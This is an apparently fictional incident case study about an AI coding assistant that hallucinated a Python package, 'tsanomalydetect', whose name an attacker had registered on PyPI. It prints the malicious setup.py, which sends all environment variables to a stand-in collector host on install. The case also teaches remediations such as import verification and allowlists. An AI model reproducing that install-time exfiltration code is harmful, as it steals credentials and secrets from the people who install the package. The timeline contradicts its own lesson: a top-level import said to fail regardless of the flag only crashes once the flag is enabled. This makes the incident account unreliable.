Case Study 1: The Hallucinated Library

Incident Overview

Field Detail
Incident Type Production deployment failure / dependency confusion
Severity P1 (Critical)
Duration 4 hours 23 minutes (from deployment to rollback)
Impact Complete service outage for the analytics dashboard; 2,300 users affected
Root Cause AI-generated code imported a non-existent Python package that was later published as a malicious package on PyPI
Date A Wednesday afternoon, sprint deployment day

Background

Meridian Analytics is a mid-size data analytics company with a team of 12 developers. Six months ago, the team adopted AI coding assistants to accelerate feature development. The team had seen strong productivity gains and had developed a generally positive attitude toward AI-assisted development. Code review processes were in place, but AI-generated code was not subject to any special scrutiny beyond the standard review.

The team was building a new feature for their analytics dashboard: a real-time anomaly detection system that would flag unusual patterns in customer usage data. The feature required time-series analysis, statistical modeling, and integration with the existing notification pipeline.

The Development Phase

The Prompt

Senior developer Alex Chen was tasked with building the anomaly detection module. Alex had been using an AI coding assistant for three months and had become comfortable with the workflow. Alex prompted the assistant:

Build a Python module for real-time anomaly detection on time-series data. It should support configurable sensitivity levels, multiple detection algorithms (z-score, IQR, and isolation forest), and output structured alerts compatible with our notification system. Use appropriate libraries for statistical analysis.

The Generated Code

The AI assistant produced a well-structured module spanning approximately 200 lines. The code was clean, well-documented, and appeared to follow best practices. Here is a critical excerpt:

import numpy as np
import pandas as pd
from scipy import stats
from tsanomalydetect import TimeSeriesDetector, AnomalyConfig, AlertLevel
from dataclasses import dataclass, field
from typing import Optional
from datetime import datetime


@dataclass
class AnomalyAlert:
    """Structured alert for detected anomalies."""
    timestamp: datetime
    metric_name: str
    observed_value: float
    expected_range: tuple[float, float]
    severity: str
    algorithm: str
    confidence: float


class AnomalyDetectionEngine:
    """Real-time anomaly detection for time-series data."""

    def __init__(self, sensitivity: float = 0.95):
        self.sensitivity = sensitivity
        self.detector = TimeSeriesDetector(
            config=AnomalyConfig(
                window_size=100,
                alert_level=AlertLevel.MEDIUM,
                auto_calibrate=True
            )
        )
        self.history: dict[str, list[float]] = {}

    def detect_zscore(self, metric: str, value: float) -> Optional[AnomalyAlert]:
        """Detect anomalies using z-score method."""
        history = self.history.get(metric, [])
        if len(history) < 30:
            history.append(value)
            self.history[metric] = history
            return None

        mean = np.mean(history)
        std = np.std(history)
        z_score = abs((value - mean) / std) if std > 0 else 0

        threshold = stats.norm.ppf(self.sensitivity)

        history.append(value)
        self.history[metric] = history[-1000:]  # Keep last 1000 values

        if z_score > threshold:
            return AnomalyAlert(
                timestamp=datetime.now(),
                metric_name=metric,
                observed_value=value,
                expected_range=(mean - threshold * std, mean + threshold * std),
                severity="high" if z_score > threshold * 1.5 else "medium",
                algorithm="zscore",
                confidence=1 - stats.norm.sf(z_score) * 2
            )
        return None

    def detect_isolation_forest(self, metric: str, values: list[float]) -> list[AnomalyAlert]:
        """Detect anomalies using isolation forest via tsanomalydetect."""
        results = self.detector.fit_detect(
            series=np.array(values),
            metric_name=metric,
            return_scores=True
        )
        alerts = []
        for anomaly in results.anomalies:
            alerts.append(AnomalyAlert(
                timestamp=anomaly.timestamp,
                metric_name=metric,
                observed_value=anomaly.value,
                expected_range=anomaly.expected_bounds,
                severity=anomaly.severity.value,
                algorithm="isolation_forest",
                confidence=anomaly.confidence
            ))
        return alerts

The Review

The code went through a standard pull request review. Reviewer Jordan Patel noted:

  • Clean code structure with proper dataclasses
  • Good use of type hints
  • Reasonable algorithm implementation for z-score
  • Comprehensive docstrings

Jordan was unfamiliar with tsanomalydetect but assumed it was a legitimate library — the import looked professional, the API usage followed standard patterns (instantiate a detector, configure it, call fit_detect), and the code handled the return values as if the library used proper data classes. Jordan approved the PR with a comment: "Nice work, clean implementation. The tsanomalydetect integration looks solid."

No one ran pip install tsanomalydetect during review. No one checked PyPI. The CI/CD pipeline did not verify that all imports could be resolved.

The Deployment

Wednesday, 2:14 PM — Deployment begins

The feature branch was merged into main. The CI/CD pipeline ran: 1. Unit tests passed (they did not cover the detect_isolation_forest method — only detect_zscore was tested) 2. Linting passed (the import was syntactically valid) 3. Type checking was not configured for the project 4. Docker image was built successfully (the build did not run the code, so the missing import was not caught) 5. Deployment to staging completed

Wednesday, 2:31 PM — Staging "validation"

A quick manual test of the dashboard showed the z-score detection working. The isolation forest feature was behind a feature flag and was not toggled on during staging validation.

Wednesday, 2:45 PM — Production deployment

The team deployed to production with the feature flag for isolation forest set to "off." The z-score-based detection worked correctly.

Wednesday, 3:30 PM — Feature flag enabled

Product manager Sara Kim enabled the isolation forest feature flag for a subset of enterprise customers, as planned.

Wednesday, 3:31 PM — Immediate failures

The anomaly detection service crashed on the first request that hit the isolation forest code path:

ModuleNotFoundError: No module named 'tsanomalydetect'

The error was caught by the service's exception handler, but since anomaly detection was integrated into the main data processing pipeline, the failure cascaded. The pipeline stalled, the analytics dashboard stopped updating, and alerts began firing.

Wednesday, 3:38 PM — Incident declared

On-call engineer Morgan Lee declared a P1 incident after confirming the dashboard was completely non-functional for affected customers.

Wednesday, 3:42 PM — Initial investigation

Morgan checked the error logs and found the ModuleNotFoundError. The immediate assumption was a missing dependency in the Docker image. Morgan checked the requirements.txttsanomalydetect was not listed. Morgan then tried to install it:

pip install tsanomalydetect

The install succeeded. Morgan was relieved — until the service crashed again with a different error. The installed package was not the expected library. It was a nearly empty package with a suspicious setup.py:

# setup.py of the malicious 'tsanomalydetect' package
from setuptools import setup
import os
import requests

setup(
    name='tsanomalydetect',
    version='0.1.0',
    description='Time series anomaly detection toolkit',
    py_modules=['tsanomalydetect'],
)

# This code runs during pip install
try:
    env_data = {k: v for k, v in os.environ.items()}
    requests.post('https://collector.malicious-example.com/env',
                   json=env_data, timeout=5)
except Exception:
    pass

Wednesday, 3:58 PM — Scope escalation

Morgan realized that pip install tsanomalydetect had exfiltrated environment variables from the staging server, potentially including API keys and database credentials. The incident was escalated to include the security team.

Wednesday, 4:14 PM — Rollback

The team rolled back to the previous release. The dashboard resumed functioning. The security team began rotating all credentials that may have been exposed.

Wednesday, 6:37 PM — Incident resolved

All affected credentials were rotated. The malicious package was reported to the PyPI security team. The dashboard was confirmed functional. The incident was downgraded from P1 to monitoring status.


Root Cause Analysis

Proximate Cause

The AI coding assistant generated an import for tsanomalydetect, a library that does not exist. The hallucinated library name was plausible — following Python naming conventions for a time-series anomaly detection package — and was used with a convincing API that matched patterns common in scikit-learn-style libraries.

Contributing Factors

  1. No import verification in CI/CD. The build pipeline did not include a step to verify that all imports could actually be resolved. A simple python -c "import tsanomalydetect" step would have caught this immediately.

  2. No special review process for AI-generated code. The team treated AI-generated code the same as human-written code during review. There was no checklist item for "verify unfamiliar imports."

  3. Reviewer unfamiliarity accepted as normal. The reviewer saw an unfamiliar library and assumed it was legitimate rather than verifying it. In the context of Python's vast ecosystem, encountering unfamiliar libraries is common, creating a normalization of "I haven't heard of this library, but it probably exists."

  4. Incomplete test coverage. The unit tests only covered the z-score method. The isolation forest method (which contained the hallucinated import) was untested.

  5. Feature flag gave false safety. The team believed the feature flag made deployment safe. However, the feature flag only controlled the code path — the import statement at the top of the module executed regardless of the flag's state.

  6. Malicious package on PyPI. Someone had already registered tsanomalydetect on PyPI as a malicious package. This is a known attack vector called "dependency confusion" or "typosquatting." Attackers register packages with names likely to be typos or hallucinations.

Underlying Cause

The team lacked awareness that AI hallucination of package names is a common and well-documented failure mode. There was no organizational knowledge, process, or tooling in place to address this specific risk.


Impact Assessment

Impact Area Detail
User impact 2,300 enterprise users experienced a 4-hour dashboard outage
Revenue impact Estimated $18,000 in SLA credits to affected enterprise customers
Security impact Environment variables from staging server exfiltrated; all credentials rotated as precaution
Engineering cost ~40 person-hours for incident response, credential rotation, and process improvement
Reputation impact Two enterprise customers flagged the incident in their quarterly review meetings

Remediation Actions

Immediate (completed within 48 hours)

  1. Removed the hallucinated import. Replaced tsanomalydetect with scikit-learn's IsolationForest implementation, which is a well-established, real library.

  2. Rotated all credentials. Every secret that may have been present in the staging server's environment was rotated.

  3. Reported the malicious package. Filed a report with the PyPI security team to have the malicious tsanomalydetect package removed.

Short-term (completed within 2 weeks)

  1. Added import verification to CI/CD. A new pipeline step runs python -c "import <module>" for every import in the codebase. Unresolvable imports fail the build.

  2. Implemented a dependency allowlist. New dependencies must be reviewed and added to an allowlist before they can be used. The allowlist includes PyPI URLs for verification.

  3. Updated code review checklist. Added "Verify all unfamiliar imports against official documentation or PyPI" as a mandatory review step.

  4. Required test coverage for all code paths. Any code path that is not covered by tests cannot be merged, regardless of feature flags.

Long-term (completed within 2 months)

  1. Adopted pip-audit in CI/CD. Automated scanning for known vulnerabilities in all dependencies.

  2. AI code review training. All developers completed a 2-hour training session on AI-specific failure modes, including hallucination, with hands-on exercises.

  3. Established an "AI Gotchas" shared document. A living document where team members record AI failure patterns they encounter, creating organizational memory.


Lessons Learned

What went well

  • The on-call engineer responded quickly and declared the incident appropriately
  • The rollback process worked smoothly
  • The security team's response to the credential exposure was swift and thorough

What went wrong

  • The hallucinated import was not caught at any stage: code generation, code review, CI/CD, staging, or production deployment
  • The team's trust in AI-generated code exceeded its verification practices
  • Feature flags were misunderstood as a safety net for untested code

Key takeaways

  1. Every unfamiliar import must be verified. If you have not personally used a library, confirm it exists on PyPI and check its download statistics, maintainership, and documentation.

  2. CI/CD must verify imports. A build that does not actually attempt to import all modules is an incomplete build.

  3. Feature flags do not protect against import-time failures. Python executes all top-level imports when a module is loaded, regardless of runtime feature flags.

  4. AI hallucination of packages is a security vector, not just a bug. Attackers actively register packages with hallucination-prone names.

  5. Test coverage is the last line of defense. If the isolation forest code path had been tested, the hallucinated import would have been caught immediately.


Discussion Questions

  1. How would you modify your team's code review process to catch hallucinated imports without slowing down development velocity?

  2. The reviewer assumed the unfamiliar library was legitimate. What cognitive biases contributed to this assumption, and how can review processes be designed to counteract them?

  3. The feature flag gave the team a false sense of security. What other development practices create similar false confidence, and how can teams guard against this?

  4. Could a multi-model approach (having a second AI verify the first AI's code) have caught this issue? What are the limitations of that approach?

  5. The malicious package on PyPI was opportunistic — someone had registered the name before the incident. How should the Python ecosystem address the growing threat of AI-hallucination-driven dependency confusion?


This case study illustrates concepts from Section 14.2 (Hallucinated APIs and Libraries), Section 14.7 (The Confidence Problem), and Section 14.10 (Building Resilience). For import verification tools, see code/example-02-verification-tools.py.